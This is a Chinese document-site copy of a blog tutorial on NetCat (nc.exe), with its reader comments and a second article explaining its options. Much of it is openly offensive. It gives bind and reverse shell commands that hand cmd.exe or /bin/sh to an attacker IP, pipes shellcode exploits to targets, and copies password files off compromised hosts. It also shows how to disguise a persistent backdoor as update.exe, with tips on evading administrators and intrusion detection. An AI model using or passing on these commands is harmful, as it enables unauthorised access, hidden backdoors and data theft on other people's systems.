瑞士军刀NC下载与使用教程.docx

上传人:b****6 文档编号:8747415 上传时间:2023-02-01 格式:DOCX 页数:12 大小:56.17KB
下载 相关 举报
瑞士军刀NC下载与使用教程.docx_第1页
第1页 / 共12页
瑞士军刀NC下载与使用教程.docx_第2页
第2页 / 共12页
瑞士军刀NC下载与使用教程.docx_第3页
第3页 / 共12页
瑞士军刀NC下载与使用教程.docx_第4页
第4页 / 共12页
瑞士军刀NC下载与使用教程.docx_第5页
第5页 / 共12页
点击查看更多>>
下载资源
资源描述

瑞士军刀NC下载与使用教程.docx

《瑞士军刀NC下载与使用教程.docx》由会员分享,可在线阅读,更多相关《瑞士军刀NC下载与使用教程.docx(12页珍藏版)》请在冰豆网上搜索。

瑞士军刀NC下载与使用教程.docx

瑞士军刀NC下载与使用教程

瑞士军刀NC下载与使用教程

nc.exe全称NetCat,被誉为网络安全界的”瑞士军刀”.nc.exe是一个非常标准的telnet客户端工具,正因为它的强大功能使得它在入侵时被广泛应用,成为黑客们的必备武器之一.

我把最近收集的nc.exe的使用方法整理了一下,发给大家.

另外还找到了一款改编后的可视化的nc,也提供给大家.

========================================================

软件介绍:

工具名:

Netcat

作者:

Hobbit && Chris Wysopal

类别:

开放源码

平台:

Linux/BSD/Unix/Windows

WINDOWS下版本号:

[v1.10 NT]

========================================================

参数介绍:

*nc.exe -h*即可看到各参数的使用方法。

基本格式:

nc [-options] hostname port[s] [ports] …

nc -l -p port [options] [hostname] [port]

-d 后台模式

-e prog 程序重定向,一旦连接,就执行 [危险!

!

]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer:

 4, 8, 12, …

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-L 连接关闭后,仍然继续监听

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 随机本地及远程端口

-s addr 本地源地址

-t 使用TELNET交互方式

-u UDP模式

-v 详细输出–用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉–用于扫描时

端口的表示方法可写为M-N的范围格式。

========================================================

基本用法:

1)连接到REMOTE主机,例子:

格式:

nc -nvv 192.168.x.x 80

讲解:

连到192.168.x.x的TCP80端口

2)监听LOCAL主机,例子:

格式:

nc -l -p 80

讲解:

监听本机的TCP80端口

3)扫描远程主机,例子:

格式:

nc -nvv -w2 -z 192.168.x.x 80-445

讲解:

扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL,例子:

格式:

nc -l -p 5354 -t -e c:

winntsystem32cmd.exe

讲解:

绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接,例子:

格式:

nc -t -e c:

winntsystem32cmd.exe 192.168.x.x 5354

讲解:

绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,

当配合管道命令”|”与重定向命令”<”、”>”等等命令功能更强大……)。

========================================================

高级用法:

6)作攻击程序用,例子:

格式1:

type.exe c:

exploit.txt|nc -nvv 192.168.x.x 80

格式2:

nc -nvv 192.168.x.x 80 < c:

exploit.txt

讲解:

连接到192.168.x.x的80端口,并在其管道中发送*c:

exploit.txt*的内容(两种格式确有相同的效果,真是有异曲同工之妙.

附:

*c:

exploit.txt*为shellcode等

7)作蜜罐用[1],例子:

格式:

nc -L -p 80

讲解:

使用*-L*(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止

8)作蜜罐用[2],例子:

格式:

nc -L -p 80 > c:

log.txt

讲解:

使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:

log.txt*中,如果把*>* 改为*>>*即可以追加日志

附:

*c:

log.txt*为日志等

9)作蜜罐用[3],例子:

格式1:

nc -L -p 80 < c:

honeypot.txt

格式2:

type.exe c:

honeypot.txt|nc -L -p 80

讲解:

使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:

honeypot.txt*的内容*送*入其管道中

10) 后门

victimmachine:

//受害者的机器

nc-l-pport-ecmd//win2000

nc-l-pport-e/bin/sh//unix,linux

attackermachine:

//攻击者的机器.

ncip-pport//连接victim_IP,然后得到一个shell。

11)反向连接

attackermachine:

//一般是sql2,远程溢出,webdavx3攻击.

//或者wollf的反向连接.

nc-vv-l-pport

victimmachine:

nc-ecmdattackerip-pport

nc-e/bin/shattackerip-pport

或者:

attackermachine:

nc-vv-l-pport1/*用于输入*/

nc-vv-l-pprot2/*用于显示*/

victimmachine:

ncattacker_ipport1 cmd ncattacker_ipport2

ncattacker_ipport1 /bin/sh ncattacker_ipport2

139要加参数-s(nc-L-p139-d-ecmd-s对方机器IP)

这样就可以保证nc优先于NETBIOS。

12)传送文件:

从肉鸡拖密码文件回来.

nc-d-l-pport

nc-vvattacker_ipport>pathfile.txt/*victimmachine*/需要Ctrl+C退出

//肉鸡需要gui界面的cmd里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

上传命令文件到肉鸡

nc-vv-l-pport>pathfile.txt     /*victimmachine*/需要Ctrl+C退出

nc-dvictim_ipport

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论:

可以传输ascii,bin文件.可以传输程序文件.

问题:

连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.

或者只有再次连接使用pskill杀掉进程.但是是否释放传输文件打开的句柄了?

13) 端口数据抓包.

nc-vv-w2-otest.txt8021-15

<000000583530302053796e746178206572726f72#500Syntaxerror

<000000682c20636f6d6d616e6420222220756e72#,command“”unr

<0000007865636f676e697a65642e0d0a#ecognized…

<00000084830000018f#…..

14) telnet,自动批处理。

ncvictim_ipport

nc-vvvictim_ipport

nc-dvictim_ipport

_______________file.cmd________________________

password

cd%windir%

echo[]=[%windir%]

c:

cd

mdtest

cd/d%windir%system32

netstopsksockserver

snake-configport11111

netstartsksockserver

exit

附件:

nc.exe(59392Byte)

附件:

mvnc.exe(188928Byte)

图片附件:

Tags:

nc,下载,瑞士军刀

ThisentrywaspostedonWednesday,February7th,2007at3:

38pmandisfiledunder安全.YoucanfollowanyresponsestothisentrythroughtheRSS2.0feed.Youcanleavearesponse,ortrackbackfromyourownsite.

7Responsesto“瑞士军刀NC下载与使用教程”

1.

abcSays:

March17th,2007at2:

04pm

ncyouduma?

2.

makerSays:

March18th,2007at5:

30am

晕倒,当然没有了,第一个是原版nc,第2个是被改造过的可视化nc.都是我自己用的东西.

3.

柳琴Says:

March25th,2007at3:

24am

其实你很够朋友的~~~当真,哈哈,谢谢你,王墨~~

4.

请教Says:

March26th,2007at4:

34am

nc监听一般要多久才能得到shell啊?

我都等了两个小时了!

………..望指教

5.

makerSays:

April5th,2007at1:

10pm

这个问题就很难回答了,如果没有连接,监听一年都是白费…

6.

fdfdSays:

September6th,2008at8:

57am

靠,刚点链接立马病毒报警

7.

makerSays:

September8th,2008at10:

07am

不懂不要乱说,谁都知道nc多数是用来发动攻击的,杀毒软件当然也不傻.

如果报警就是有病毒那估计这个世界上就没有人下木马了,下灰鸽子安装包的时候也会报警.

LeaveaReply

窗体顶端

Name(required)

Mail(willnotbepublished)(required)

Website

窗体底端

∙Pages

o关于我

o留言簿

o联系我

∙Categories

o代码

o作品

o其他

o分享

o安全

o宣传

o技术

o日记

o相册

o笔记

∙Archives

oApril2010 

(1)

oMarch2010 (4)

oFebruary2010 

(1)

oJanuary2010 

(2)

oOctober2009 

(1)

oAugust2009 

(1)

oJune2009 

(2)

oFebruary2009 

(1)

oDecember2008 

(1)

oOctober2008 (3)

oSeptember2008 (3)

oAugust2008 (5)

oJuly2008 

(1)

oJune2008 

(1)

oMay2008 

(2)

oApril2008 (5)

oDecember2007 

(2)

oNovember2007 (3)

oSeptember2007 (8)

oJuly2007 

(2)

oJune2007 (13)

oMay2007 (5)

oMarch2007 

(2)

oFebruary2007 (14)

oJanuary2007 (9)

oDecember2006 (10)

oNovember2006 (4)

oSeptember2006 

(1)

oAugust2006 

(1)

oJuly2006 

(2)

∙Blogroll

o4’ssymfonyblog

o积木之城

∙Contributors

o积木之城

∙Meta

oRegister

oLogin

oEntriesRSS

oCommentsRSS

oWordPress.org

(c)2008byMaker’sblog.SitepoweredbyWordPressanddesignedbyAzeemAzeezandDaveRigotti.

Entries(RSS)andComments(RSS).

 

在入侵中它是最经典的工具之一,NetCat被所有的网络安全爱好者和研究者称之为瑞士军刀,通过名字大家就能知道他的功能足够丰富。

nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。

它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。

从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。

NetCat没有图形界面,很粗糙,很原始。

nc可以通过很多途径下载得到,unix和Winodws平台下的官方站点是:

http:

//

nc的命令行

nc的基本命令行形式是nc[options]hostports,其中host是要扫描的主机名或IP地址,ports要么是一个单独的端口,要么是一个端口范围(用m-n的形式指定),要么是一系列用空格隔开的单个端口。

-d 只对Windows操作系统有用,该选项使NetCat以隐蔽模式工作,从而脱离MS-DOS命令提示符下环境运行,使得nc不需要保持打开命令窗口便可在监听模式下运行,也可以帮助黑客很好地隐藏监听NetCat实例而不被系统管理员发现。

-e如果NetCat使用gaping_security_hole选项进行编译,那么只要某人在NET后台所监听的任何端口上建立连接,该NetCat都将执行,且客户端的NetCat会通过管道将I/O传输到在别处监听的另一个NetCat实例中。

使用这个选项非常危险,除非你对nc相当了解,起码知道你自己在做什么。

这是在系统中建立后门shell的一个非常快捷且容易的方法。

-i延时间隔,表示在两次数据发送之间nc等待的时间。

例如:

当经过管道传输一个文件到nc的时候,在传输输入的下一行之前,nc将等待的秒数。

当使用nc对一台主机的多个端口之间进行操作时,在切换到下一个端口之前,nc等待的秒数。

这样可以使黑客在进行数据传输或对一个服务进行攻击的时候更加隐蔽,也可以帮助你的端口扫描不被入侵检测系统和系统管理员发现。

-g这个选项具有欺骗性。

nc支持loosesourcerouting(松散源路由)。

你可以在命令行中指定多达8个-g选项来强迫nc流量经过特定的IP地址,这在你为流量设置伪造的源IP地址时,可以利用这个方法达到通过防火墙的过滤器或者允许访问主机列表,希望接收到从主机返回的响应。

-G该选项让用户在-g选项所指定的路由列表中指定的一个地址作为当前的下一路由,由于IP地址为4字节大小(IPV4),所以这个参数总是4字节的倍数;例如,4代表路由表中的第一个IP地址,8代表第二个IP地址,依次类推。

这在伪造部分源路由表使得报文看起来相当的有用。

在进行欺骗和源路由时,这个功能有助于屏蔽你的位置,但也不一定能接收到响应报文,因为响应报文将经过由伪造的IP地址反路由回来。

-l该选项切换nc的监听模式。

此选项必须与-p选项一起使用以告诉nc绑定某个指定的TCP端口并等待到来的连接。

若换成-u选项,则应使用UDP端口而非TCP端口。

-L该选项在Windows版本中有用,当一个连接被关闭后,使用相同的命令行选项进行重启监听模式,即使此时初始的连接已经结束,nc也能在不需要用户干涉的情况下接收后面新的连接。

与-l一样,必须与-p同时使用。

-n该选项告诉我们nc不做任何主机名查找的工作。

-0对数据执行一次十六进制转储(hexdump)并将其存储在hexfile中。

命令nc-ohexfile将把双向通信的数据记录下来,在每行的开始处会有一个“<"或">”用来分别指示是进入数据还是外出数据。

如果只想得到对进入数据的十六进制转储,可以使用nc-ohexfile命令。

-p让用户指定一个nc应使用的本地端口号。

当通过-l或-L选项来使用监听模式的时候,这个参数是必需的。

如果没有为外出连接指定这个参数,则与大多数其他TCP或UDP客户程序的做法一样,nc将使用系统分配给他的任何端口。

-r该参数使nc可以随机选择本地和远程端口。

当使用nc在系统中范围很大的一批端口上获取信息时,要想混合源端口和目标端口的顺序看起来不怎么象端口扫描,这个选项是很有用的。

当这个选项与-i选项和一个足够大的间隔结合使用的时候,在不被注意的端口扫描成功几率能得到很大提升。

-s指定nc建立连接时所使用的IP地址,该选项允许黑客做一些工作,它允许黑客隐藏他们的IP地址或假冒他人的IP地址,但是要得到路由到他们所欺骗的地址的任何信息,都需要使用-g源路由选项。

其次,当处于监听模式时,大多数情况下都可以与一个已经监听的服务“预先绑定”,所有TCP和UDP服务都绑定到某个端口。

-t如果使用telnet选项编译,nc就可以与telnet服务器进行telnet选项协商,虽然它的响应是毫无意义的信息,但可以通过该状态看到连接23端口的信息。

-unc使用UDP而非TCP,在客户模式和监听模式下都起作用。

-v控制nc将要做的事情达到的程度,如使用nc-v,那么nc将仅吐出它所接收到的数据,一个单独的-v可以知道它连接或绑定的地址是否有问题发生,第2个-v可以让nc在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。

-w控制在一个连接上nc放弃之前等待的时间。

同时也告诉nc当在标准输入上接收到一个eof(end-of-file)之后应该等待多长时间来关闭连接并退出。

如果你通过nc向远程服务器发送命令并且期望大量的数据返回(例如:

向一台web服务器发送一个http命令以下载一个大文件),该选项是很有用的。

nc的具体使用

c:

\nc.exe-l-p4455-d-ecmd.exe可以很好的隐藏一个NetCat后门。

c:

\nc.exe-p4455-d-L-ecmd.exe这个命令可以让黑客利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,

c:

\movenc.exec:

\windows\system32\Drivers\update.exe

c:

\windows\systeme32\drivers\update.exe-p4455-d-L-ecmd.exe

系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。

c:

\windows\systme32\drivers\update.exe

cmdline:

-l-p4455-d-L-ecmd.exe

c:

\>

nc-l-p80 监听80端口

nc-l-p80>c:

\log.dat 监听80端口,并把信息记录到log.dat中

nc-v-l-p80 监听80端口,并显示端口信息

nc-vv-l-p80监听80端口,显示更详细的端口信息

nc-l-p80-t-ecmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。

当然这个最好用在控制的肉鸡上。

nc-vipport扫瞄某IP的某个端口

nc-v-zipport-port扫描某IP的端口到某端口

nc-v-z-uip port-port扫描某IP的某UDP端口到某UDP端口

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 党团工作 > 入党转正申请

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1